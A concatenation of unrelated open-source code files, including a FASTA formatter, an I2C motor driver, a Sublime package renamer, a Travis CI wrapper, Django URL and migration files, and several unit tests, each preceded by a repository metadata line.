        #First pass to see if help menu was called
        for o, a in options:
            if o in ("-h", "-help", "--help"):
                self.display_help("Exiting because help menu was called.")
        #Second pass to set all args.
        for opt, arg_raw in options:
            arg = arg_raw.replace(" ","")
            arg = arg.strip()
            opt = opt.replace("-","")
            #print(opt,arg)
            if opt == "h" or opt == "help":
                continue
            elif opt=="one2many" or opt=="1":
                self.one2many=arg
            elif opt=="many2one" or opt=="M":
                self.many2one=arg
            elif opt=="width" or opt=="w":
                self.width=int(arg)
            elif opt=="out" or opt=="o":
                self.out=arg
            else:
                assert False, "Unhandled option %r"%opt
        #Check mandatory options are set
        if not self.one2many and not self.many2one:
            self.display_help("No files provided.")
    def display_help(self, message=None):
        """Print usage (preceded by *message*, if given) and exit."""
        if message is not None:
            print()
            print (message)
        print ("\nfastaFormatter.py\n")
        print("Author: Tyler K Chafin, University of Arkansas")
        print ("Contact: tkchafin@uark.edu")
        print ("Description:Right now just converts b/n multi-line and one-line fasta formats, might add later")
        print("""
	-1,--one2many	: Path to fasta file to multi-line format
	-M,--many2one	: Path to fasta file to convert to one-line format
	-w,--width	: Characters per line for multi-line (default: 60)
	-o,--out	: Output file name (default=out.fas)
	""")
        print()
        sys.exit()
#Call main function
if __name__ == '__main__':
    main()
|
vnevoa/DiffTrike | SoapBox/sb_motor_njay.py | Python | gpl-3.0 | 8,501 | 0.030585 | #
# Copyright 2011 Vasco Nevoa.
#
# This file is part of DiffTrike.
#
# DiffTrike is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DiffTrike is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DiffTrike. If not, see <http://www.gnu.org/licenses/>.
#
# This module implements the electric motor driver and data extraction.
#
import struct, time, thread
import i2c_lib
# Bridge controller registers:
REG_COMMAND = 0 #RW, Special functions, see comments below.
REG_STATUS = 1 #RO, b0~b3: heartbeat, b4:over-current, b5:over-temperature, b6:busy, b7:?
REG_PWM = 2 #RW, b7: direction; b0~6: Speed [0, 10..117]
REG_BRIDGETEMP = 3 #RO, controller temperature, raw diode reading, inversely proportional [?]
REG_MOTORTEMP = 4 #RO, motor temperature, raw diode reading, inversely proportional [?]
REG_CURRENT = 5 #RO, motoring current, Real = Read / 10 [A]
REG_BATTVOLTAGE = 6 #RO, controller's power supply voltage, Real = Read / 10 + 10 [V]
REG_FW_VERSION = 7 #RO, firmware version
# REG_COMMAND available commands:
# eCmd_Reset = 0: Turn off all FETs and reinitialize controller pins.
# eCmd_SetI2cAddr = 1: Write I2C address (in REG_CURRENT) to EEPROM (#ifnotdef DISABLE_EEPROM_WRITE)
# eCmd_SetVref = 2: Write ADC Vref (REG_CURRENT * 10) in EEPROM (#ifnotdef DISABLE_EEPROM_WRITE)
# eCmd_GetVref = 3: Get ADC Vref from EEPROM
# eCmd_DoDoublePulseTest = 4: "Double Pulse", REG_PWM = length of 1st pulse [us], REG_CURRENT = length of pause [us] (#ifdef ENABLE_DOUBLE_PULSE)
MAX_PWM = 117.0
class I2CMotorBridge():
def __init__(self, name, filename, address, debug=False):
self.busy = False # microprocessor busy
self.alarm_I = False # overcurrent alarm
self.alarm_T = False # overtemperature alarm
self.i2c_ops = 0 # i/o total count
self.blockings = 0 # i/o fail count
self.I = 0.0 # current Motoring current :)
self.T = 0.0 # current Bridge temperature
self.mT = 0.0 # current Motor temperature
self.V = 0.0 # current Battery voltage
self.power = 0.0 # desired power from application
self.last_pwm = 0 # last effectively written PWM value
self.device = i2c_lib.I2CSlave(name, filename, address)
self.ongoing = False # i/o thread lifespan control
self.reset = False # did the bridge reset?
self.resets = 0 # how many times did the bridge reset?
self.name = name # friendly name
self.debug = debug # should I speak loudly?
self.shorted = False # are we short-circuiting the motor?
if self.test():
self.ongoing = True
thread.start_new_thread(self.ioPump, ())
else:
print "Device initialization failed. [%s]" % self.device.getId()
def __del__(self):
if self.ongoing: time.sleep(0.30)
def test(self):
try:
t0 = time.time()
self.refreshStatus()
t1 = time.time()
if self.debug: print "Firmware revision = %d, Read takes %0.1fms" % (self.fw, 1000*(t1-t0))
return True
except:
return False
def ioPump(self):
t0 = time.time()
self.i2c_ops = 0
busy = 0
clip = 0
temp = 0
self.resets = 0
self.shorts = 0
max_I = 0.0
min_V = 100.0
while self.ongoing:
# GET status:
try:
self.refreshStatus()
self.blockings = 0
if self.busy: busy += 1
if self.alarm_I: clip += 1
if self.alarm_T: temp += 1
if self.reset: self.resets += 1
if self.I > max_I: max_I = self.I
if self.V < min_V: min_V = self.V
except:
self.blockings += 1
# count all read attempts
self.i2c_ops += 1
# SET behavior:
try:
self.writePower()
self.blockings = 0
except:
self.blockings += 1
# count all write attempts
self.i2c_ops += 1
# PRINT cycle:
if self.debug:
t1 = time.time()
if ((t1 - t0) * 1000) > 1000:
t0 = t1
line = "%s:\n %d ios; %3.3f%% fail;" % (self.device.getId(), self.i2c_ops, 100.0*self.blockings/self.i2c_ops)
line += " pwm = %d%%;" % (self.power * 100.0)
if self.shorts > 0 :
line += " SCs = %d; " % self.shorts
line += " max curr = %2.1f A;" % max_I
line += " min volt = %2.1f V;" % min_V
if clip: line += " CLIP = %d;" % clip
if self.resets: line += " RESETS = %d;" % self.resets
print line + "\n"
clip = 0
self.resets = 0
self.shorts = 0
max_I = 0.0
min_V = 100.0
# SLEEP:
time.sleep(0.050) # 50ms -> 20 loops per second
# exit if we fail I/O for 0.1s (10 = 5 R + 5 W)
#if self.blockings > 10 :
# self.ongoing = False
def refreshStatus(self):
(a, b, c, d, e, f, g, h) = self.getRawData()
#print "%s %2x %2x %2x %2x %2x %2x %2x %2x" % (self.name, a, b, c, d, e, f, g, h)
if h != 27: # counts as a glitch
raise Exception("I2C garbage!")
# bridge forgot my order?
self.reset = (c != self.last_pwm)
# b = REG_STATUS
self.alarm_I = b & 0x10 # b4: current limited
# d = REG_BRIDGETEMP
self.T = (255.0 - d) # ???
# e = REG_MOTORTEMP
self.mT = (255.0 - e) # ???
# f = REG_CURRENT
self.I = f / 10.0 # Amp
# g = REG_BATTVOLTAGE
self.V = g / 10.0 + 10 # Volt
# h = REG_FW_VERSION
self.fw = h # firmware revision
def getCurrent(self):
return self.I # Ampere
def getTemperature(self):
return self.T # Celsius
def getMotorTemperature(self):
return self.mT # Celsius
def getVoltage(self):
return self.V # Volt
def setPower(self, desired): # [-1..1]
self.power = max(desired, -1.0)
self.power = min(desired, 1.0)
def getRawData(self):
self.device.seek(0) # seek to beginning of registers.
data = self.device.read(8)
return struct.unpack('BBBBBBBB', data) # dump all of them.
def writePower(self):
# if the IO pump stops, throw the towel.
if not self.ongoing :
raise Exception("No I/O pump!")
if abs(self.power) > 0.08:
# if power > 8%, we are motoring:
self.last_pwm = int(abs(self.power) * MAX_PWM)
if self.shorted :
self.device.write(REG_COMMAND, 0x7F, 0x80) # turn off braking
self.shorted = False
if self.power < 0 : self.last_pwm |= 0x80 # reverse direction
inv = int(0xFF & ~self.last_pwm) # binary complement as check
self.device.write(REG_PWM, inv, self.last_pwm)
else:
# if power < 8%, we are braking or curving:
# toggle short-circuiting = regenerative braking
if not self.shorted :
self.device.write(REG_COMMAND, 0x7E, 0x81) # turn on braking -> motor is brake, heats up
self.shorted = True
self.shorts += 1
else:
self.device.write(REG_COMMAND, 0x7F, 0x80) # turn off braking -> motor is generator, heats up, battery charges
self.shorted = False
# This is a simple test routine that only runs if this module is
# called directly with "python sb_motor_md03.py"
if __name__ == '__main__':
mL = I2CMotorBridge('LEFT', '/dev/i2c-1', 0x22, True)
mLok = mL.ongoin | g
mR = I2CMotorBridge('RIGHT', '/dev/i2c-1', 0x23, True)
mRok = mR.ongoing
pmin = -int(MAX_PWM/2)
pmax = int(MAX_PWM/2)
while mLok or mRok:
for i in range(0, pmax+1) + range(pmin, 1):
#print "Setting power = %d%%" % (100 * i/MAX_PWM)
| if mLok: mL.setPower(i/MAX_PWM)
if mRok: mR.setPower(i/MAX_PWM)
#if mLok: print "LEFT P %3d%%, B.T %3d, M.T %3d, I %2.1f A, U %2.1f V" % (mL.power*100, mL.getTemperature(), mL.getMotorTemperature(), mL.getCurrent(), mL.getVoltage())
#if mRok: print "RIGHT P %3d%%, B.T %3d, M.T %3d, I %2.1f A, |
koery/win-sublime | Data/Packages/Package Control/package_control/package_renamer.py | Python | mit | 5,516 | 0.003626 | import os
import time
import sublime
from .console_write import console_write
from .package_disabler import PackageDisabler
from .settings import pc_settings_filename, load_list_setting, save_list_setting
class PackageRenamer(PackageDisabler):
    """
    Class to handle renaming packages via the renamed_packages setting
    gathered from channels and repositories.
    """

    def load_settings(self):
        """
        Loads the list of installed packages
        """
        settings = sublime.load_settings(pc_settings_filename())
        self.original_installed_packages = load_list_setting(settings, 'installed_packages')

    def rename_packages(self, installer):
        """
        Renames any installed packages that the user has installed.

        BUG FIX: the deferred ``sublime.set_timeout`` callbacks inside the
        loop previously closed over the loop variables ``package_name`` /
        ``new_package_name`` late-bound, so a callback firing after the loop
        advanced could act on the wrong package. The names are now bound at
        lambda creation time via default arguments.

        :param installer:
            An instance of :class:`PackageInstaller`
        """
        # Fetch the packages since that will pull in the renamed packages list
        installer.manager.list_available_packages()
        renamed_packages = installer.manager.settings.get('renamed_packages', {})
        if not renamed_packages:
            renamed_packages = {}

        # These are packages that have been tracked as installed
        installed_packages = list(self.original_installed_packages)
        # These are the packages actually present on the filesystem
        present_packages = installer.manager.list_packages()

        case_insensitive_fs = sublime.platform() in ['windows', 'osx']

        # Rename directories for packages that have changed names
        for package_name in renamed_packages:
            new_package_name = renamed_packages[package_name]
            changing_case = package_name.lower() == new_package_name.lower()

            # Since Windows and OSX use case-insensitive filesystems, we have to
            # scan through the list of installed packages if the rename of the
            # package is just changing the case of it. If we don't find the old
            # name for it, we continue the loop since os.path.exists() will return
            # true due to the case-insensitive nature of the filesystems.
            has_old = False
            if case_insensitive_fs and changing_case:
                for present_package_name in present_packages:
                    if present_package_name == package_name:
                        has_old = True
                        break
                if not has_old:
                    continue

            # For handling .sublime-package files
            package_file = os.path.join(sublime.installed_packages_path(),
                package_name + '.sublime-package')
            # For handling unpacked packages
            package_dir = os.path.join(sublime.packages_path(), package_name)
            if os.path.exists(package_file):
                new_package_path = os.path.join(sublime.installed_packages_path(),
                    new_package_name + '.sublime-package')
                package_path = package_file
            elif os.path.exists(os.path.join(package_dir, 'package-metadata.json')):
                new_package_path = os.path.join(sublime.packages_path(),
                    new_package_name)
                package_path = package_dir
            else:
                continue

            # Bind the current name via a default argument (early binding).
            sublime.set_timeout(lambda name=package_name: self.disable_packages(name, 'remove'), 10)

            if not os.path.exists(new_package_path) or (case_insensitive_fs and changing_case):
                sublime.set_timeout(lambda name=new_package_name: self.disable_packages(name, 'install'), 10)
                time.sleep(0.7)

                # Windows will not allow you to rename to the same name with
                # a different case, so we work around that with a temporary name
                if os.name == 'nt' and changing_case:
                    temp_package_name = '__' + new_package_name
                    temp_package_path = os.path.join(sublime.packages_path(),
                        temp_package_name)
                    os.rename(package_path, temp_package_path)
                    package_path = temp_package_path

                os.rename(package_path, new_package_path)
                installed_packages.append(new_package_name)

                console_write(u'Renamed %s to %s' % (package_name, new_package_name), True)
                sublime.set_timeout(lambda name=new_package_name: self.reenable_package(name, 'install'), 700)
            else:
                time.sleep(0.7)
                installer.manager.remove_package(package_name)
                message_string = u'Removed %s since package with new name (%s) already exists' % (
                    package_name, new_package_name)
                console_write(message_string, True)
                sublime.set_timeout(lambda name=package_name: self.reenable_package(name, 'remove'), 700)

            try:
                installed_packages.remove(package_name)
            except (ValueError):
                pass

        sublime.set_timeout(lambda: self.save_packages(installed_packages), 10)

    def save_packages(self, installed_packages):
        """
        Saves the list of installed packages (after having been appropriately
        renamed)

        :param installed_packages:
            The new list of installed packages
        """
        filename = pc_settings_filename()
        settings = sublime.load_settings(filename)
        save_list_setting(settings, filename, 'installed_packages',
            installed_packages, self.original_installed_packages)
|
Schevo/kiwi | examples/framework/hey/heyglade.py | Python | lgpl-2.1 | 194 | 0 | #!/usr/bin/env python
import gtk
from kiwi.ui.gadgets import quit_if_last
from kiwi.ui.views import BaseView
# Build the main view from the "hey" glade file; quit_if_last ends the GTK
# main loop once the last window is closed.
app = BaseView(gladefile="hey", delete_handler=quit_if_last)
app.show()
gtk.main()
| |
TomasHofman/did | tests/test_did.py | Python | gpl-2.0 | 1,194 | 0.001675 | # coding: utf-8
""" Tests for the command line script """
from __future__ import unicode_literals, absolute_import
import os
import re
import did.cli
import did.utils
# Prepare path and config examples
PATH = os.path.dirname(os.path.realpath(__file__))
# NOTE(review): did.base is accessed below but only did.cli / did.utils are
# imported at the top; this relies on did.cli importing did.base -- confirm.
MINIMAL = did.base.Config.example()
EXAMPLE = "".join(open(PATH + "/../examples/config").readlines())
# Substitute example git paths for real life directories
EXAMPLE = re.sub(r"\S+/git/[a-z]+", PATH, EXAMPLE)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Minimal Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def test_help_minimal():
    """ Help message with minimal config """
    # Install the minimal example config as the active configuration.
    did.base.Config(config=MINIMAL)
    try:
        did.cli.main(["--help"])
    except SystemExit:
        # argparse exits with SystemExit after printing help; expected.
        pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Example Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ~~~~~~~~~~~~~~~~~~~~~~~~ | ~~~~~
def test_help_example():
    """ Help message with example config """
    # Install the full example config as the active configuration.
    did.base.Config(config=EXAMPLE)
    try:
        did.cli.main(["--help"])
    except SystemExit:
        # argparse exits with SystemExit after printing help; expected.
        pass
|
callowayproject/django-viewpoint | viewpoint/syndication/blogger/urls.py | Python | apache-2.0 | 2,338 | 0.003849 | # -*- coding: utf-8 -*-
"""Urls used in blogger API handling.
:Authors:
- Bruce Kroeze
"""
"""
New BSD License
===============
Copyright (c) 2008, Bruce Kroeze http://solidsitesolutions.com
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SolidSite | Solutions LLC, Zefamily LLC nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR I | MPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__docformat__="restructuredtext"
# Mapping used to register the legacy Blogger API methods with an XML-RPC
# dispatcher: (dotted path to the handler function, exposed XML-RPC name).
BLOGGER_METHODS = (
    # We list methods to be exposed in the form (<method path>, <xml-rpc name>,)
    ('banjo.blog.syndication.blogger.pub.delete_post', 'blogger.deletePost'),
    ('banjo.blog.syndication.blogger.pub.get_users_blogs', 'blogger.getUsersBlogs'),
    ('banjo.blog.syndication.blogger.pub.get_user_info', 'blogger.getUserInfo'),
    ('banjo.blog.syndication.blogger.pub.new_post', 'blogger.newPost'),
)
# TODO - maybe: implement the rest of the old blogger functions
# blogger.editPost
# blogger.getTemplate
# blogger.setTemplate
# blogger.getPost
# blogger.getRecentPosts
|
jantman/rebuildbot | rebuildbot/travis.py | Python | agpl-3.0 | 10,259 | 0.00039 | """
rebuildbot/travis.py
Wrapper around travispy
The latest version of this package is available at:
<https://github.com/jantman/rebuildbot>
################################################################################
Copyright 2015 Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
This file is part of rebuildbot.
rebuildbot is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
rebuildbot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with rebuildbot. If not, see <http://www.gnu.org/licenses/>.
The Copyright and Authors attributions contained herein may not be removed or
otherwise altered, except to add the Author attribution of a contributor to
this work. (Additional Terms pursuant to Section 7b of the AGPL v3)
################################################################################
While not legally required, I sincerely request that anyone who finds
bugs please submit them at <https://github.com/jantman/rebuildbot> or
to me via email, and that you send any contributions or improvements
either as a pull request on GitHub, or to me via email.
################################################################################
AUTHORS:
Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
################################################################################
"""
import time
import logging
from dateutil import parser
from datetime import timedelta, datetime
import pytz
from rebuildbot.exceptions import (PollTimeoutException, TravisTriggerError)
try:
from urllib import quote
except ImportError:
from urllib.parse import quote
from travispy import TravisPy
from travispy.travispy import PUBLIC
logger = logging.getLogger(__name__)
CHECK_WAIT_TIME = 10 # seconds to wait before polling for builds
POLL_NUM_TIMES = 6 # how many times to poll before raising exception
class Travis(object):
"""
ReBuildBot wrapper around TravisPy.
"""
    def __init__(self, github_token):
        """
        Connect to TravisCI and cache the authenticated user.

        (Docstring fix: as a constructor this returns None; the connected
        :py:class:`TravisPy` client is stored on ``self.travis`` and the
        authenticated user on ``self.user``.)

        :param github_token: GitHub access token to auth to Travis with
        :type github_token: str
        """
        self.travis = TravisPy.github_auth(github_token)
        self.user = self.travis.user()
        logger.debug("Authenticated to TravisCI as %s <%s> (user ID %s)",
                     self.user.login, self.user.email, self.user.id)
    def get_repos(self, date_check=True):
        """
        Return a list of all repo names for the current authenticated user. If
        ``date_check`` is True, only return repos with a last build more
        than 24 hours ago.
        This only returns repos with a slug (<user_or_org>/<repo_name>) that
        begins with the user login; it ignores organization repos or repos
        that the user is a collaborator on.
        :param date_check: whether or not to only return repos with a last
          build more than 24 hours ago.
        :type date_check: bool
        :returns: list of the user's repository slugs
        :rtype: list of strings
        """
        repos = []
        for r in self.travis.repos(member=self.user.login):
            if not r.slug.startswith(self.user.login + '/'):
                logger.debug("Ignoring repo owned by another user: %s", r.slug)
                continue
            build_in_last_day = False
            try:
                build_in_last_day = self.repo_build_in_last_day(r)
            except KeyError:
                # NOTE(review): assumes travispy raises KeyError when a repo
                # has never been built -- confirm AttributeError cannot occur
                # here instead (e.g. last_build being None).
                logger.debug('Skipping repo with no builds: %s', r.slug)
                continue
            if date_check and build_in_last_day:
                logger.debug("Skipping repo with build in last day: %s", r.slug)
                continue
            repos.append(r.slug)
        logger.debug('Found %d repos: %s', len(repos), repos)
        # Sorted for deterministic ordering of the returned slugs.
        return sorted(repos)
def repo_build_in_last_day(self, repo):
"""
Return True if the repo has had a build in the last day, False otherwise
:param repo: Travis repository object
:rtype: bool
"""
now = datetime.now(pytz.utc)
dt = parser.parse(repo.last_build.started_at)
if now - dt > timedelta(hours=24):
return False
return True
    def run_build(self, repo_slug, branch='master'):
        """
        Trigger a Travis build of the specified repository on the specified
        branch. Wait for the build repository's latest build ID to change,
        and then return a 2-tuple of the old build id and the new one.

        If the new build has not started within the timeout interval, the
        new build ID will be None.

        :param repo_slug: repository slug (<username>/<repo_name>)
        :type repo_slug: string
        :param branch: name of the branch to build
        :type branch: string
        :raises: PollTimeoutException, TravisTriggerError
        :returns: (last build ID, new build ID)
        :rtype: tuple
        """
        repo = self.travis.repo(repo_slug)
        logger.info("Travis Repo %s (%s): pending=%s queued=%s running=%s "
                    "state=%s", repo_slug, repo.id, repo.pending, repo.queued,
                    repo.running, repo.state)
        # Capture the current latest build BEFORE triggering, so the new
        # build can be detected as a changed last_build ID afterwards.
        last_build = repo.last_build
        logger.debug("Found last build as #%s (%s), state=%s (%s), "
                     "started_at=%s (<%s>)",
                     last_build.number, last_build.id,
                     last_build.state, last_build.color, last_build.started_at,
                     self.url_for_build(repo_slug, last_build.id))
        self.trigger_travis(repo_slug, branch=branch)
        try:
            new_id = self.wait_for_new_build(repo_slug, last_build.id)
        except PollTimeoutException:
            # Non-fatal: signal "not started yet" with None so the caller
            # can poll again later.
            logger.warning("Could not find new build ID for %s within timeout;"
                           " will poll later." % repo_slug)
            new_id = None
        return (last_build.id, new_id)
    def wait_for_new_build(self, repo_slug, last_build_id):
        """
        Wait for a repository to show a new last build ID, indicating that the
        triggered build has started or is queued.

        This polls for the last_build ID every :py:const:`~.CHECK_WAIT_TIME`
        seconds, up to :py:const:`~.POLL_NUM_TIMES` times. If the ID has not
        changed at the end, raise a :py:class:`~.PollTimeoutException`.

        :param repo_slug: the slug for the repo to check
        :type repo_slug: string
        :param last_build_id: the ID of the last build
        :type last_build_id: int
        :raises: PollTimeoutException, TravisTriggerError
        :returns: ID of the new build
        :rtype: int
        """
        logger.info("Waiting up to %s seconds for build of %s to start",
                    (POLL_NUM_TIMES * CHECK_WAIT_TIME), repo_slug)
        for c in range(0, POLL_NUM_TIMES):
            build_id = self.get_last_build(repo_slug).id
            if build_id != last_build_id:
                logger.debug("Found new build ID: %s", build_id)
                return build_id
            logger.debug("Build has not started; waiting %ss", CHECK_WAIT_TIME)
            time.sleep(CHECK_WAIT_TIME)
        else:
            # for/else: the loop body returns on success, so reaching here
            # means every poll saw the old build ID.
            raise PollTimeoutException('last_build.id', repo_slug,
                                       CHECK_WAIT_TIME, POLL_NUM_TIMES)
def get_last_build(self, repo_slug):
"""
Return the TravisPy.Build object for the last build of the repo.
"""
return self.travis.repo(repo_slug).last_build
def trigger_travis(self, repo_slug, branch='master'):
"""
Trigger a TravisCI build of a specific branch of a |
johncosta/private-readthedocs.org | readthedocs/builds/urls.py | Python | mit | 741 | 0.009447 | from django.conf.urls.defaults import *
# URL routes for build list and build detail pages.
# NOTE: this file targets the legacy ``patterns()``/string-view API
# (pre-Django 1.8), matching the ``django.conf.urls.defaults`` import above.
urlpatterns = patterns('builds.views',
    url(r'^$',
        'build_list',
        name='builds_list'
    ),
    url(r'^(?P<project_slug>[-\w]+)/(?P<pk>\d+)/$',
        'build_detail',
        name='builds_detail'
    ),
    url(r'^(?P<username>\w+)/(?P<project_slug>[-\w]+)/(?P<pk>\d+)/$',
        'legacy_build_detail',
        name='legacy_builds_detail'
    ),
    url(r'^(?P<project_slug>[-\w]+)/$',
        'build_list',
        name='builds_project_list'
    ),
    url(r'^(?P<username>\w+)/(?P<project_slug>[-\w]+)/$',
        'legacy_build_list',
        name='legacy_builds_project_list'
    ),
    url(r'^tag/(?P<tag>\w+)/$',
        'build_list',
        name='builds_tag_list'
    ),
)
|
bnsantos/python-junk-code | tests/lists/linkedListTest.py | Python | gpl-2.0 | 4,159 | 0.00024 | __author__ = 'bruno'
import unittest
import algorithms.lists.linkedList as LinkedList
class TestLinkedList(unittest.TestCase):
    """Exercises LinkedList add/remove/count/find_m_to_last_element.

    Fixes extraction artifacts that had broken the loop in
    ``test_linked_list_8``.
    """

    def setUp(self):
        pass

    def test_linked_list_1(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(5))
        linked_list.add(LinkedList.Element(4))
        linked_list.add(LinkedList.Element(3))
        linked_list.add(LinkedList.Element(2))
        linked_list.add(LinkedList.Element(1))
        self.assertEqual(True, linked_list.remove(4))
        self.assertEqual(True, linked_list.remove(3))
        self.assertEqual(True, linked_list.remove(2))
        self.assertEqual(True, linked_list.remove(1))
        self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(True, linked_list.empty())

    def test_linked_list_2(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 11):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(False, linked_list.empty())

    def test_linked_list_3(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 10):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(5, linked_list.find_m_to_last_element(5))

    def test_linked_list_4(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        self.assertEqual(495, linked_list.find_m_to_last_element(5))

    def test_linked_list_5(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(100):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(400, linked_list.count())
        self.assertEqual(485, linked_list.find_m_to_last_element(15))

    def test_linked_list_6(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(300):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(200, linked_list.count())
        self.assertEqual(400, linked_list.find_m_to_last_element(100))

    def test_linked_list_7(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(350):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(150, linked_list.count())

    def test_linked_list_8(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(300):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(200, linked_list.count())
        # Drain the remaining 200 elements.
        for i in range(300, 500):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(0, linked_list.count())

    # NOTE(review): test_linked_list_9 duplicates test_linked_list_7 exactly;
    # kept for backward compatibility of the test suite.
    def test_linked_list_9(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(350):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(150, linked_list.count())

    def test_linked_list_10(self):
        linked_list = LinkedList.LinkedList(LinkedList.Element(0))
        for i in range(1, 500):
            linked_list.add(LinkedList.Element(i))
        self.assertEqual(500, linked_list.count())
        for i in range(500):
            self.assertEqual(True, linked_list.remove(0))
        self.assertEqual(0, linked_list.count())
        self.assertEqual(False, linked_list.remove(0))
IlyaDjurin/django-shop | shop/migrations/0010_auto_20170325_1640.py | Python | mit | 729 | 0.001372 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-25 13:40
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Add created/updated timestamps to the ``tovar_img`` model.

    Reconstructed from extraction artifacts that had split the
    ``migrations.Migration`` base class and the ``tovar_created`` field name.
    """

    dependencies = [
        ('shop', '0009_auto_20170325_1625'),
    ]

    operations = [
        migrations.AddField(
            model_name='tovar_img',
            name='tovar_created',
            # One-off default backfills existing rows; auto_now_add takes
            # over afterwards, hence preserve_default=False.
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='tovar_img',
            name='tovar_updated',
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
fstagni/DIRAC | tests/Integration/AccountingSystem/Test_DataStoreClient.py | Python | gpl-3.0 | 1,561 | 0.019859 | """ This is a test of the chain
DataStoreClient -> DataStoreHandler -> AccountingDB
It supposes that the DB is present, and that the service is running
this is pytest!
"""
# pylint: disable=invalid-name,wrong-import-position
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.AccountingSystem.Client.DataStoreClient import gDataStoreClient
from DIRAC.AccountingSystem.Client.Types.DataOperation import DataOperation
gLogger.setLevel('DEBUG')
def createAccountingRecord():
  """Build a DataOperation record describing one successful test transfer.

  Fixes an extraction artifact that had split ``accountingDict`` in the
  ``setValuesFromDict`` call, and collapses the key-by-key assignments
  into a single dict literal.
  """
  accountingDict = {
      'OperationType': 'putAndRegister',
      'User': 'system',
      'Protocol': 'DataManager',
      'RegistrationTime': 0.0,
      'RegistrationOK': 0,
      'RegistrationTotal': 0,
      'Destination': 'se',
      'TransferTotal': 1,
      'TransferOK': 1,
      'TransferSize': 1,
      'TransferTime': 0.0,
      'FinalStatus': 'Successful',
      'Source': 'testSite',
  }
  oDataOperation = DataOperation()
  oDataOperation.setValuesFromDict(accountingDict)
  return oDataOperation
def test_addAndRemove():
  """Insert one accounting record, commit it, then remove it again."""
  # just inserting one record
  record = createAccountingRecord()
  record.setStartTime()
  record.setEndTime()
  res = gDataStoreClient.addRegister(record)
